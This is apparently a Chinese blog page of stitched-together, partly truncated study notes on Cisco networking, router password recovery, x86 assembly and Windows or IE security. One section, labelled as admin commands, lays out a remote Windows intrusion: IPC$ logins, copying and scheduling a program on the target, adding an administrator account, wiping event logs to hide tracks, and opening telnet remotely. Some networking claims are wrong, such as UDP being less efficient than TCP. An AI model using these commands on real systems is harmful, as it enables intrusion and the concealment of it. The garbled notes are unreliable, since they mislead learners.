ＣＩＳＣＯ将网络分为：访问层；分发层；核心层．低端交换机工作在访问层；路由器工作在分发层；高端交换机工作在核心层，不处理数据包，最快交换数据包．
　　ＯＳＩ七层最基本的作用：方便不同厂商的网络设备互联集成．
　　广域网里线缆的类型：ＥＩＡ／ＴＩＡ－２３２；Ｖ．３５，（物理层协议）
　　计算机与计算机ＭＡＣ在通信，ＭＡＣ是网卡唯一的标识，ＩＰ地址是逻辑地址，局域网协议：８０２.２；８０２.３；广域网协议：ＨＤＬＣ．
　　ＩＰ地址与ＩＰＸ地址是在网络层定义．
　　ＴＣＰ可靠；ＳＰＸ；ＵＤＰ不可靠
　　ＴＣＰ效率高，占用带宽大；ＵＤＰ效率低，占用带宽小，用何种协议取决于上层应用．
数据链路层:①LLC;②MAC.过程:①封装;②拆封.
网桥，ＳＷＩＴＣＨ工作数据链路层；ＨＵＢ工作物理层；ＲＯＵＴＥ工作在网络层．
　　ＨＵＢ和ＳＷＩＴＣＨ的区别：①Ｈ共享带宽，Ｓ独占带宽；②Ｈ出在同一个冲突域，Ｓ有几个端口就有几个冲突域．共同点：都不能隔离广播与多播，Ｈ里用ＣＳＭＡ／ＣＤ．

但我个人认为网络上（http://www.net130.com/CMS/Pub/special/special_password/04141.htm）讲述的应该更确切．Cisco路由器和交换机口令的恢复(1000, 2600, 3600, 4500, 4700, AS5x00, 6x00, 7000 (RSP7000), 7100, 7200, uBR7200, 7500, 12000, MC3810, LightStream101 0, and Catalyst 5500 (RSM), and 8500)ContentsDescription
Step-by-Step Procedure
Example of Password Recovery on a Cisco 2600
Related InformationDescriptionThis document describes the password recovery procedure for the following Cisco products:Cisco 1003 Cisco 1004 Cisco 1005 Cisco 1600 Cisco 1700 Cisco 2600 Cisco 3600 Cisco 4500 Cisco 4700 Cisco AS5x00 Cisco 6x00 Cisco 7000 (RSP7000) Cisco 7100 Cisco 7200 Cisco uBR7200 Cisco 7500 Cisco 12000 Cisco LS1010 Catalyst 5500 (RSM) Catalyst 8510-CSR Catalyst 8510-MSR Catalyst 8540-CSR Catalyst 8540-MSR Cisco MC3810 Step-by-Step ProcedureAttach a terminal or PC with terminal emulation to the console port of the router. Use the following terminal settings: 9600 baud rate
No parity
8 data bits
1

个人学习记录:
CISCO 2500系列:通过超级终端接入路由器
１）在开启路由器60秒内按CTRL+BREAK；
２）在提示符(:>)输入:o/i 0x2142；
３）：＞i；
４）＃copy start run；
５）修改密码；
６）＃wr；
７）＃configure　terminal；
８）（）＃config－register　0x2102．

ＣＩＳＣＯ　２６００系列：通过超级终端接入路由器
１）在开启路由器60秒内按CTRL+BREAK，此时进入监控模式，提示符为：rommon　１　＞；
２）rommon 1 >confreg 0x2142;
３）rommon 1 >reset;
４）此时正常进入路由器，在特权模式下敲入：copy start run;
５）修改密码；
６）＃wr;
７）#configure terminal;
８）()#config-register 0x2102.

网络上（http://www.net130.com/CMS/Pub/special/special_password/2007_02_06_99811.htm）提供的方法：
在Cisco路由器忘记或丢失enable密码的情况时，一共有两种方法恢复，取决于你使用的路由器是哪一系列产品。 第一种方法 使用这种方法可恢复下列路由器：Cisco 2000系列、2500系列、3000系列、使用680x0 Motorol a CPU的Cisco 4000系列、运行10.0版本以上Cisco IOS系统的7000系列路由器。 实现步骤： 1.在路由器的console口接上一个终端或用安装仿真终端软件的PC机。 2.输入show version命令，然后记下寄存器值，通常是0x2102 or 0x102。这个值显示在最后一行，注意寄存器的配置是否把Break设为enable或disable。 缺省配置寄存器值是0x2102。这个值从左数第三个数字如果是1，则是disable Break；如果为零，则Break为enabled。 3.切断电源后再重启。 4.

MOV 指令为双操作数指令,两个操作数中必须有一个是寄存器.
MOVDST , SRC //Byte / Word
执行操作: dst = src
1.目的数可以是通用寄存器, 存储单元和段寄存器(但不允许用CS段寄存器).
2.立即数不能直接送段寄存器
3.不允许在两个存储单元直接传送数据
4.不允许在两个段寄存器间直接传送信息

PUSH 入栈指令及POP出栈指令: 堆栈操作是以"后进先出"的方式进行数据操作.
PUSH SRC //Word
入栈的操作数除不允许用立即数外，可以为通用寄存器，段寄存器(全部)和存储器.
入栈时高位字节先入栈，低位字节后入栈.
POP DST //Word
出栈操作数除不允许用立即数和CS段寄存器外, 可以为通用寄存器,段寄存器和存储器.
执行POP SS指令后,堆栈区在存储区的位置要改变.
执行POPSP 指令后,栈顶的位置要改变.

XCHG(eXCHanG)交换指令: 将两操作数值交换.
XCHG OPR1, OPR2 //Byte/Word
执行操作: Tmp=OPR1 OPR1=OPR2 OPR2=Tmp
1.必须有一个操作数是在寄存器中
2.不能与段寄存器交换数据
3.存储器与存储器之间不能交换数据.

XLAT(TRANSLATE)换码指令: 把一种代码转换为另一种代码.
XLAT (OPR 可选) //Byte
执行操作: AL=(BX+AL)
指令执行时只使用预先已存入BX中的表格首地址,执行后,AL中内容则是所要转换的代码.

LEA(Load Effective Address) 有效地址传送寄存器指令
LEA REG , SRC //指令把源操作数SRC的有效地址送到指定的寄存器中.
执行操作: REG= EAsrc
注: SRC只能是各种寻址方式的存储器操作数,REG只能是16位寄存器
MOV BX , OFFSET OPER_ONE 等价于 LEA BX ,

大部分用户现在使用的都是WINDOWS系统,在此系统下不建议使用优化大师和清理助手之类的软件。不只是因为微软至今没有正式推出这方面的功能软件，只要是这类软件在使用过程中可能导致系统出现某些故障。主要原因是：
1、这类软件是一些工作室或国内的软件公司编写的。他们没有得到微软系统的内核源码和微软的授权认证，不能准确断定文件是否是系统的必须文件。
2、用户系统中可能安装了一些个性的、专业的应用软件，在这些使用的文件中也没有微软的认证，使用是没问题的，就是在通过优化大师或清理助手处理时会被误认为是木马病毒，因而被清理掉。这样就使你的应用软件无法正常使用了。
3、这类软件的原理就很机械化，不能灵活地，准确地判断系统中的文件。
还有其他方面的原因，因此建议所有用户拒绝安装类似软件，更不要使用这些软件。这类软件也不否定对用户在某些方面提供方便，本人认为弊大于利！

针对IE的恶意修改、攻击方法非常多，本文中介绍的十种反黑技巧，一定会对你有所帮助。 1.管理好Cookie 在IE6.0中，打开“工具”→“Internet选项”→“隐私”对话框，这里设定了“阻止所有Cookie”、“ 高”、“中高”、“中”、“低”、“接受所有Cookie”六个级别(默认为“中”)，你只要拖动滑块就可以方便地进行设定，而点击下方的“编辑”按钮，在“网站地址”中输入特定的网址，就可以将其设定为允许或拒绝它们使用Cookie。 2.禁用或限制使用Java程序及ActiveX控件 在网页中经常使用Java、Java Applet、ActiveX编写的脚本，它们可能会获取你的用户标识、IP地址，乃至口令，甚至会在你的机器上安装某些程序或进行其他操作，因此应对Java、Java小程序脚本、ActiveX控件和插件的使用进行限制。打开“Internet选项”→“安全”→“自定义级别”，就可以设置“ActiveX控件和插件”、“Java”、“脚本”、“下载”、“用户验证”以及其它安全选项。对于一些不太安全的控件或插件以及下载操作，应该予以禁止、限制，至少要进行提示。 3.防止泄露自己的信息 缺省条件下，用户在第一次使用Web地址、表单、表单的用户名和密码后，同意保存密码，在下一次再进入同样的Web页及输入密码时，只需输入开头部分，后面的就会自动完成，给用户带来了方便，但同时也留下了安全隐患，不过我们可以通过调整“自动完成”功能的设置来解决。设置方法如下：依次点击“Internet选项”→“内容”→“自动完成”，打开“自动完成设置”对话框，选中要使用的“自动完成”复选项。 提醒：为发安全起见，防止泄露自己的一些信息，应该定期清除历史记录，方法是在“自动完成设置”对话框中点击“清除表单”和“清除密码”按钮。 4.清除已浏览过的网址 在“Internet选项”对话框中的“常规”标签下单击历史记录区域的“清除历史记录”按钮即可。若只想清除部分记录，单击IE工具栏上的“历史”按钮，在左栏的地址历史记录中，找到希望清除的地址或其下网页，单击鼠标右键，从弹出的快捷菜单中选取“删除”。 5.清除已访问过的网页 为了加快浏览速度，IE会自动把你浏览过的网页保存在缓存文件夹“C:/Windows/Temporary Internet Files”下。当你确认不再需要浏览过的网页时，

随着计算机的普及和信息技术的发展，“计算机病毒”一词对每一个人来说都已经不再陌生了，现如今计算机病毒可谓层出不穷，甚至让广大计算机用户几乎到了“谈毒色变”的程度。江民公司技术工程师发现有许多用户对操作系统下的文件不是很了解了解，以至于产生种种的怀疑。以下是用户经常怀疑是病毒的文件: 一、Thumb.db文 件 Thumb.db文件被用户误认为是病毒的原因应该有三点： 1、该文件在一些操作系统中的带有图片的文件夹中都存在； 2、即使删除此文件，下次打开该文件夹时仍会生成； 3、该文件可能会不断增大。 其实，Thumb.db文件在Windows Me或更新的Windows版本中都会有，这是Windows对图片的缓存(也可以说是缓冲文件)，它可以方便用户对图片进行预览，图片越多，这个文件可能就越大，这是正常的。在Windows XP系统下可以在“文件夹选项”里面选择“不缓存缩略图”，就不会产生这种文件了。 二、Mfm1992文件 或“Mfm1992.AVB.AVB.AVB.AVB(后缀是无穷AVB)” Mfm1992文件用户误认为是病毒的主要原因应该是:此文件可能生成在任何一个文件夹中，而且删除后可能还会重新生成。 Mfm1992文件是由于智能ABC的词库出错而产生的一个文件。由于智能ABC输入法的词库容量有限，当超出这个容量的时候，就会产生这个文件。当前程序运行在哪个目录，这个文件就在该目录下产生。这个文件的大小一般为43KB。这是智能ABC4.0的一个Bug，Win2000和me中自带的智能 ABC5.0已经修正了这个错误。 如果想让计算机中不再出现这个文件，有两种办法: 1、可以把4.0的智能ABC升级至高版本。 2、可以把Windowssystem目录下的*.rem文件删除，然后重启计算机。 三、Word的临时文件 用户在打开一个Word文档时会发现在同一个目录下出现了一个与原文档名称相同但前面加了一个“~$”符号的文件，它的图标与Word文档的图标相同，但是“灰”颜色的(即具有隐藏属性)。许多用户觉得可疑，认为是病毒造成的。 其实这是一个正常的现象，这个文件是Word生成的，可以理解为是一个缓冲文件，它的作用是最大限度的保存由于意外原因(如突然死机等)造成的用户对修改或建立的Word文档在未进行保存时的损失。其实这个文件在关闭了Word文档后即会自动消失，用户不

网络管理员应知道的几条命令
常用的几条NET命令： 　　（与远程主机建立空管连接） net use file://IP/地址\ipc$ "" /use:"" 　　（以管理员身份登录远程主机） net use file://IP/地址\ipc$ "密码" /use:"Adminis trator" 　　（传送文件到远程主机WINNT目录下）copy 本机目录路径\程序 file://IP/地址\admin$ 　　（查看远程主机时间） net time file://IP/地址 　　（定时启动某个程序） at file://IP/地址 02:18 readme.exe 　　（查看共享） net view file://IP/地址 　　（查看netbios工作组列表） nbtstat -A IP地址 　　（将远程主机C盘映射为自己的F盘） net use f: file://IP/地址\c$ ""/user:"Administrator" 　　（这两条把自己增加到管理员组）： net user 用户名 密码 /add 　　net localgroup Administrators 用户名 /add 　　（断开连接） net use file://IP/地址\ipc$ /delete 　　扫尾： 　　del C:\winnt\system32\logfiles\*.* 　　del C:\winnt\ssytem32\config\*.evt 　　del C:\winnt\system32\dtclog\*.* 　　del C:\winnt\system32\*.log 　　del C:\winnt\system32\*.txt 　　del C:\winnt\*.txt 　　del C:\winnt\*.log 　　一、netsvc.exe 　　下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务： 　　netsvc /list file://IP/地址 　　netsvc schedule file://IP/地址 /query 　　netsvc file://IP/地址 schedule /start 　　二、OpenTelnet.exe 　　远程启动主机的Telnet服务，并绑定端口到7878，例如： 　　OpenTelnet file:/

配置安全的win2k系统
初级安全篇 1.物理安全 服务器应该安放在安装了监视器的隔离房间内，并且监视器要保留15天以上的摄像记录。另外，机箱,键盘，电脑桌抽屉要上锁，以确保旁人即使进入房间也无法使用电 脑，钥匙要放在另外的安全的地方。 2.停掉Guest 帐号 在计算机管理的用户里面把guest帐号停用掉，任何时候都不允许guest帐号登陆系统。为了保险起见，最好给guest 加一个复杂的密码，你可以打开记事本，在里面输入一串包含特殊字符,数字，字母的长字符串，然后把它作为guest帐号的密码拷进去。 3．限制不必要的用户数量 去掉所有的duplicate user 帐户, 测试用帐户, 共享帐号，普通部门帐号等等。用户组策略设置相应权限，并且经常检查系统的帐户，删除已经不在使用的帐户。这些帐户很多时候都是黑客们入侵系统的突破口，系统的帐户越多，黑客们得到合法用户的权限可能性一般也就越大。国内的nt/2000主机，如果系统帐户超过10个，一般都能找出一两个弱口令帐户。我曾经发现一台主机197个帐户中竟然有180个帐号都是弱口令帐户。 4．创建2个管理员用帐号 虽然这点看上去和上面这点有些矛盾，但事实上是服从上面的规则的。 创建一个一般权限帐号用来收信以及处理一些日常事物，另一个拥有Administrators 权限的帐户只在需要的时候使用。可以让管理员使用 " RunAS" 命令来执行一些需要特权才能作的一些工作，以方便管理。 5．把系统administrator帐号改名 大家都知道，windows 2000 的administrator帐号是不能被停用的，这意味着别人可以一遍又一边的尝试这个帐户的密码。把Administrator帐户改名可以有效的防止这一点。当然，请不要使用Admin之类的名字，改了等于没改，尽量把它伪装成普通用户，比如改成：guestone 。 6．创建一个陷阱帐号 什么是陷阱帐号? Look!>创建一个名为" Administrator"的本地帐户，把它的权限设置成最低，什么事也干不了的那种，并且加上一个超过10位的超级复杂密码。这样可以让那些 Scripts s忙上一段时间了，并且可以借此发现它们的入侵企图。或者在它的login scripts上面做点手脚。嘿嘿，够损！ 7.把共享文件的权限从"everyone"组改成"授

发博客，交博友，从现在开始你的博客生涯吧。^_^